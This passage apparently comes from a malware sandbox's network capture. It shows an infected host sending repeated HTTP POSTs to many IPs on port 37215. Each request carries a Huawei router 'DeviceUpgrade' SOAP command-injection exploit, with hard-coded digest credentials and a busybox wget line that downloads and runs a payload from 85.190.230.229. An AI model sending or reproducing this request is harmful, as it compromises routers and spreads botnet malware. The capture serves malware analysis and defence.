                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474021912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      66192.168.2.1446146156.148.99.20737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.636348009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      67192.168.2.1448622156.96.7.15937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.637573957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.978094101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482218981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474071980 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458249092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425784111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361799955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233263969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999509096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
